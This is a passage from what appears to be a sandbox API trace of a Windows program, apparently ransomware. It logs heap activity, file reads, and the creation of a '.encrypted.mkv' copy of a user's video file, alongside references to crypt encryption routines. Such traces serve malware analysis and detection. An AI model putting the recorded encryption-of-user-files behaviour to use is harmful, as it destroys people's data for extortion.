dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0042.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0042.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0042.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0042.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0042.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0042.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0042.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0042.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0042.085] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0042.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0042.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0042.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0042.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0042.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0042.086] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0042.086] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0042.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0042.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0042.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0042.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0042.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0042.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0042.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0042.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0042.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0042.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0042.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0042.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0042.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0042.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0042.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0042.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0042.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0042.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0042.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0042.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0042.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0042.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0042.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0042.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0042.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0042.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0042.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0042.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0042.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0042.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0042.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0042.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0042.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0042.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0042.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0042.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0042.087] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl")) returned 0x10 [0042.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0042.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0042.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0042.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0042.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0042.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0042.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0042.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0042.088] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.encrypted.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\0bc6y2qc_04ddnddghl.encrypted.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0042.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0042.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0042.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0042.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0042.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0042.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0042.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0042.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0042.088] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0042.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0042.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0042.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0042.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0042.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0042.088] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0042.089] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0042.089] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0042.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0042.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0042.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0042.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0042.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0042.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0042.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0042.089] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0042.089] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0042.092] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x435f, lpOverlapped=0x0) returned 1 [0042.092] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0042.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0042.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0042.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1435f) returned 0xac2018 [0042.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0042.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0042.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0042.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0042.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0042.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0042.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1435f) returned 0x935008 [0042.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0042.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.096] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0042.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0042.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1435f) returned 0xac2018 [0042.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0042.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0042.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0042.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.097] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0042.097] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0042.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0042.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0042.097] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0042.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0042.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0042.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0042.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0042.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0042.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1435f) returned 0xac2018 [0042.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0042.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0042.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0042.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0042.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da318 [0042.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0042.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0042.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0042.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da178 [0042.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0042.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0042.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0042.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9d0 [0042.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0042.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0042.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0042.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0042.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0042.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1435f) returned 0x949370 [0042.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0042.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0042.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0042.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0042.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0042.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0042.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0042.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0042.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0042.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0042.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0042.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0042.099] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0042.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0042.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0042.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0042.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0042.100] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0042.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0042.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0042.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0042.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0042.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0042.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0042.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0042.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0042.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0042.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0042.100] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0042.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0042.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0042.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da238 [0042.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0042.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0042.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0042.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0042.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a90 [0042.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0042.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0042.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0042.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0042.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0042.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0042.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0042.100] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0042.100] RtlAllocateHeap 